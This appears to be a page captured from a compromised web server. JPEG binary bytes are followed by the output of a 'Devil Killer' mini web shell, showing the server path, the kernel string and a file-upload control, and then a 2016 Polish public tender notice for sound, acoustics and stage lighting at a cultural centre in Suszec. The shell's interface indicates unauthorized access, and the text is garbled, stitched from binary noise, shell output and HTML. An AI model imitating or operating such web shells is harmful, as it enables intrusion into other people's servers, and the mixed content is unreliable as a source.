JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/158275-N-2016.html

<p class="kh_header"><b>Suszec: Dostawa i montaż systemu nagłośnienia (elektroakustyki), systemu akustyki wnętrza oraz systemu oświetlania scenicznego w ramach zadania pn. Modernizacja Gminnego Ośrodka Kultury w Suszcu</b><br>
<b>Numer ogłoszenia: 158275 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury w Suszcu , ul. Ogrodowa 22, 43-267 Suszec, woj. śląskie, tel. 32 2124491, faks 32 2124491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kulturasuszec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: SAMORZĄDOWA INSTYTUCJA KULTURY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż systemu nagłośnienia (elektroakustyki), systemu akustyki wnętrza oraz systemu oświetlania scenicznego w ramach zadania pn. Modernizacja Gminnego Ośrodka Kultury w Suszcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZGODNIE Z PKT. 3 SIWZ:
3.	Opis przedmiotu zamówienia:

3.1	Przedmiotem zamówienia jest: Dostawa i montaż systemu nagłośnienia (elektroakustyki), systemu akustyki wnętrza oraz systemu oświetlania scenicznego w ramach zadania pn. Modernizacja Gminnego Ośrodka Kultury w Suszcu, zwana dalej zamówieniem, zgodnie z dokumentacją projektową.

3.2	W zakres przedmiotu zamówienia wchodzi m.in.:

-		wykonanie adaptacji akustycznej widowni i sceny,
-	wyposażenie Gminnego Ośrodka Kultury w Suszcu, zwanego dalej GOK, w specjalistyczny sprzęt elektroakustyczny z możliwością wykorzystania systemu poza salą GOK oraz nagłaśniania konferencji, prelekcji, prezentacji bez użycia konsolety cyfrowej (bez obecności akustyka), 
-		rozbudowa oświetlenia scenicznego,
-	usunięcie szkód powstałych w trakcie realizacji zamówienia, prace porządkowe, itp.
-	zapewnienie na własny koszt prawidłowego zabezpieczenia prowadzonych robót montażowych oraz obowiązek przestrzegania przepisów BHP przy wykonywanych pracach montażowych. Roboty montażowe prowadzone będą w budynku po malowaniu, dlatego konieczne będzie zachowanie szczególnej ostrożności i stosowanie zabezpieczeń zapobiegających ewentualnym uszkodzeniom elementów wnętrz, w tym mat chroniących parkiet,
-	uporządkowanie pomieszczeń, każdorazowo po każdym dniu roboczym, w celu udostępnienia pomieszczenia na planowane imprezy i wesela,
-	dokonanie pierwszego uruchomienia zamontowanych urządzeń i systemów,
-	OBOWIĄZEK PRZEPROWADZENIA PODSTAWOWEGO SZKOLENIA W OBSŁUDZE ZAMONTOWANYCH URZĄDZEŃ OSÓB WYZNACZONYCH PRZEZ ZAMAWIAJĄCEGO w ustalonym przez zamawiającego terminie,
-	OBOWIĄZEK DOKONYWANIA W UDZIELONYM OKRESIE GWARANCYJNYM,                       W RAMACH WYNAGRODZENIA UMOWNEGO WYMAGANYCH PRZEGLĄDÓW I KOMPLETNYCH CZYNNOŚCI KONSERWACYJNYCH (SERWISOWYCH), WYMAGANYCH DO UTRZYMANIA GWARANCJI NA DOSTARCZONYCH, ZAMONTOWANYCH LUB ZAINSTALOWANYCH W RAMACH NINIEJSZEGO PRZEDMIOTU ZAMÓWIENIA URZĄDZENIACH I SYTEMACH W ZAKRESIE ELEKTROAKUSTYKI, AKUSTYKI WNĘTRZ I OŚWIETLENIA, BEZ WEZWANIA ZAMAWIAJĄCEGO.

3.3	Szczegółowy opis zamówienia stanowią:
1.	formularz wyceny - zał. nr 1.A do SIWZ (akustyka wnętrza, elektroakustyka, oświetlenie sceniczne),
2.	koncepcja w zakresie akustyki wnętrza, elektroakustyki oraz oświetlenia scenicznego - zał. nr 9,
3.	specyfikacja techniczna akustyki wnętrza, elektroakustyki oraz oświetlenia scenicznego - zał. nr 10 (załącznik wymagany do wypełnienia przez WYKONAWCĘ),
i zwane są w dalszej treści SIWZ dokumentacją projektową.
		
3.4	Produkty (urządzenia techniczne, sprzęt elektroakustyczny, okablowanie, itp.) związane z wykonaniem akustyki wnętrza, systemu nagłośnienia i oświetlenia scenicznego, muszą być fabrycznie nowe, nieużywane i wolne od wad oraz muszą spełniać wszelkie normy i wymagania wyrobów dopuszczonych do obrotu i stosowania w Polsce.

3.5	Zamawiający wymaga, aby zastosowane przy realizacji zamówienia produkty, posiadały wymagane przepisami prawa atesty, certyfikaty, aprobaty techniczne i świadectwa dopuszczenia do stosowania.

3.6	Równoważność oferty.

Dla urządzeń technicznych, materiałów (produktów) i rozwiązań, które w w/w dokumentacji projektowej zostały opisane poprzez wskazanie znaków towarowych, patentów lub pochodzenia, Zamawiający dopuszcza rozwiązania równoważne. 

Za urządzenia techniczne, materiały (produkty) i rozwiązania równoważne zamawiający uznaje takie urządzenia techniczne, materiały (produkty) i rozwiązania, które w porównaniu z wyrobami przewidzianymi dokumentacją projektową, charakteryzują się porównywalnymi cechami, tj. taką samą lub wyższą jakością, trwałością, funkcjonalnością, niezawodnością, parametrami technicznymi i eksploatacyjnymi oraz służą do tego samego celu.

Określony w w/w dokumentacji projektowej przedmiot zamówienia, został opisany za pomocą norm, aprobat i specyfikacji technicznych, dla których zamawiający dopuszcza rozwiązania równoważne opisanym. 

Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, (w szczególności produkty opisane w dokumentacji wskazanej w pkt. 3.3 ppkt. 3 SIWZ oraz wymienione w pkt. 3.4 SIWZ) spełniają wymagania określone przez zamawiającego.

Wykazanie równoważności dla proponowanych dostaw spoczywa na Wykonawcy na etapie złożenia oferty.
 
Zamawiający zastrzega sobie możliwość zwrotu produktów niespełniających wymogów jakościowych (technicznych i użytkowych) oczekiwanych przez Zamawiającego na koszt i ryzyko wykonawcy.

UWAGA! Na potrzeby jednolitego porównania i oceny ofert, w celu potwierdzenia, że oferowane produkty: (urządzenia techniczne, sprzęt elektroakustyczny, okablowanie, itp.) związane z wykonaniem akustyki wnętrza, systemu nagłośnienia (elektroakustyki) i oświetlenia scenicznego spełniają wymogi określone przez Zamawiającego, każdy wykonawca jest zobowiązany załączyć do oferty dokumenty wymienione w pkt. 8.2.3 SIWZ, w tym wypełniony zał. nr 10 do SIWZ.
Przedmiot dostawy, stanowiący treść oferty, musi być jednoznacznie określony w dacie złożenia oferty.
3.7	Opis przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV): 
	Sprzęt radiowy, telewizyjny, komunikacyjny, telekomunikacyjny, podobny - 32000000-3
	Sprzęt nagłaśniający - 32342400-6 
	Sprzęt dźwiękowy -  32342410-9
	Lampy i oprawy oświetleniowe - 31520000-7
	Urządzenia oświetleniowe i lampy elektryczne - 31500000-1 
	Roboty instalacyjne w budynkach  - 45300000-0
	Roboty w zakresie okablowania oraz instalacji elektrycznych - 45311000-0
	 	
3.8	Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione w istotnych postanowieniach umowy - stanowiących załącznik nr 2 do SIWZ. Wykonawca jest zobowiązany do ich uważnego przeanalizowania i zapoznania się z zakresem przedmiotu zamówienia. Zaleca się dokonanie wizji w miejscu wykonywania robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.00.00.00-3, 32.34.24.00-6, 32.34.24.10-9, 31.52.00.00-7, 31.50.00.00-1, 45.30.00.00-0, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE WYMAGA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w sytuacji, gdy wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie:
 			
-	co najmniej jedno zamówienie obejmujące łącznie dostawę i montaż systemu nagłośnienia, systemu akustyki wnętrza i systemu oświetlenia sceny dla obiektu typu: dom kultury, teatr, opera, filharmonia, sala widowiskowa, sala koncertowa, o ilości miejsc siedzących minimum 250, o wartości  min. 250 000,00 zł brutto,
oraz przedłoży dokumenty potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie;

Jeżeli w dokumencie potwierdzającym należyte wykonanie zamówienia zakres rzeczowy nie został jasno wykazany, wykonawca winien zakres ten określić w zał. nr 6 w kol. 2, aby zamawiający mógł dokonać oceny spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w sytuacji, gdy wykonawca wykaże, że dysponuje wymienionymi poniżej osobami, posiadającymi uprawnienia do pełnienia funkcji:
-		SPECJALISTY W ZAKRESIE ELEKTROAKUSTYKI - tj. osobą, posiadającą wykształcenie w zakresie AKUSTYKA z minimum 5 letnim doświadczeniem  zawodowym, który w okresie ostatnich 3 lat pełnił rolę kierownika prac przy realizacji co najmniej 1 zamówienia obejmującego akustykę wnętrz /lub  instalację systemów elektroakustycznych w instytucjach typu: domy kultury, teatry, opery, filharmonie, sale widowiskowe, sale koncertowe, o ilości miejsc siedzących minimum 250;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>JAK W PKT. III.3.2) NINIEJSZEGO OGŁOSZENIA;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYMAGANE DOKUMENTY: - WYMIENIONE W PKT 8.2 PKT.3 SIWZ, W TYM WYPEŁNIONY PRZEZ WYKONAWCĘ ZAŁ. NR 10 DO SIWZ, WYMIENIONE W PKT 8.2.5 - 8.2.13 SIWZ (m.in. tłumaczenia, pełnomocnictwa, zobowiązania) oraz WYMIENIONE W PKT 14 a- d SIWZ (m.in. formularz oferty, formularz wyceny 1.A)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - OKRES GWARANCJI - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZGODNIE Z PKT. 21.2 - 21.4 SIWZ:
21.2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:

21.2.1.	ZMIANY OGÓLNE:
a)	zmiana adresu/siedziby/konta/firmy Zamawiającego/Wykonawcy,
b)	zmiana osób reprezentujących Zamawiającego/Wykonawcy,
c)	zmiana będąca skutkiem poprawy oczywistej omyłki,
d)	zmiany wynikające z zapisów §5 zał. nr 2 do SIWZ.

21.2.2.	INNE ZMIANY DOPUSZCZALNE NA PODSTAWIE ART. 144 USTAWY:

a)	w zakresie przedmiotu zamówienia w następujących przypadkach:
-	wystąpienia uzasadnionych zmian w zakresie sposobu lub technologii wykonania przedmiotu zamówienia, jeżeli te zmiany są niezbędne do prawidłowego wykonania zamówienia,
-	zastosowania produktu zamiennego w stosunku do zaoferowanego o parametrach nie gorszych od produktu objętego umową z przyczyn, których nie można było przewidzieć przed podpisaniem umowy, a które są konieczne do prawidłowego zrealizowania przedmiotu zamówienia, bez zmiany wynagrodzenia;

b)	w zakresie wynagrodzenia wykonawcy w następujących przypadkach:
-	zmiany wysokości wynagrodzenia brutto w przypadku zmiany w okresie  obowiązywania umowy stawki podatku VAT (jego zwiększenia lub zmniejszenia) - wysokość wynagrodzenia brutto będzie wyliczana od wartości netto oferty, która pozostaje bez zmian, 

c)	w zakresie umówionego terminu wykonania zamówienia w następujących przypadkach:
	-	z przyczyn określonych w pkt 21.2.2 lit. a), jeżeli przyczyny te mają wpływ na termin wykonania zamówienia,
	-	działania osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron (protesty, listy, petycje, itp.), 
	-	zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację umowy po dacie jej podpisania,
-	przedłużenia terminu dostawy urządzenia z udokumentowanych przyczyn leżących po stronie producenta;
-	działania sił natury, uznanego za stan klęski żywiołowej,
-		zmiany treści umowy w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyzna środki na sfinansowanie zamówienia w całości lub w części,
-		wystąpienia konieczności wykonania zamówienia dodatkowego w rozumieniu art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych               (j.t. Dz. U. z 2015 r., poz. 2164), którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy,

d)	w zakresie przedmiotu zamówienia, wynagrodzenia wykonawcy, umówionego terminu wykonania zamówienia w następujących przypadkach:
-	zmiany treści umowy, gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która będzie współfinansowała realizację przedmiotu zamówienia,
-	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy.

Uwaga:	zmiana postanowień umowy na podst. art. 144 ustawy, może być dokonana na podstawie w/w przesłanek określonych w pkt 21.2.2 lit. a) - d) tylko wtedy, gdy wystąpią one z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować oraz pod warunkiem, że takiej zgody udzieli instytucja która będzie współfinansowała realizację przedmiotu zamówienia i że Zamawiający nie straci dofinansowania lub nie zostanie ono z tego tytułu ograniczone.

21.3.		Zamawiający nie przedłuży terminu zakończenia umowy, jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.

21.4.	Określa się następujący tryb dokonywania zmian postanowień umowy:
1.	Sposób inicjowania zmian:
a)	Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany, niezwłocznie po zajściu okoliczności uzasadniającej zmianę,
b)	Wspólne podjęcie decyzji przez obie strony na podstawie ustaleń na radach budowy, zatwierdzone protokołem z narady.
2.	Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.). 
3.	W rezultacie dokonania czynności opisanych powyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kulturasuszec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Kultury w Suszcu ul. Ogrodowa 22 43-267 Suszec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 09:00, miejsce: Gminny Ośrodek Kultury w Suszcu ul. Ogrodowa 22 43-267 Suszec DZIAŁ ADMINISTRACYJNY, POK. NR 68.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




